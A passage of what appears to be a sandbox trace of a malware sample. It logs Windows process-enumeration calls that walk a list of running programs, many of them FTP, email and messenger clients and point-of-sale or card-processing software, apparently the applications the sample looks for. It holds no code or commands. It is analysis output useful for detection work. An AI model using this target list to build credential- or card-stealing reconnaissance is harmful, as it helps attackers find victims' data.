th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0161.523] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0161.525] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0161.527] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0161.529] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0161.558] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0161.560] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0161.563] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0161.565] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0161.568] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0161.571] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0161.573] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0161.575] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0161.577] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0161.579] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0161.581] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0161.584] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0161.586] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0161.588] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0161.590] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0161.596] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0161.599] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0161.601] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0161.603] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0161.606] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0161.608] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0161.610] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0161.612] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0161.615] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0161.617] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0161.620] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0161.633] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0161.635] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0161.637] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0161.640] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0161.646] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0161.647] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0161.649] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0161.651] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0161.654] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0161.657] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0161.659] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0161.661] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0161.664] CloseHandle (hObject=0x1df8) returned 1 [0161.664] Sleep (dwMilliseconds=0x64) [0161.792] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1ed4 [0161.812] Process32First (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0161.815] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0161.817] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0161.820] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0161.822] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0161.824] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0161.827] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0161.886] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0161.889] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0161.892] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.894] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.897] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0161.899] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.902] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.904] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.906] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.908] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.911] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.914] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.916] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0161.918] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0161.938] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0161.941] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0161.944] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.947] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0161.949] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0161.952] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0161.954] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0161.956] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0161.958] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0161.960] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.962] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0161.964] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0161.967] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0161.968] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0161.971] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.973] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0161.978] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0161.981] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0161.983] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0161.985] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0161.987] Process32Next (in: 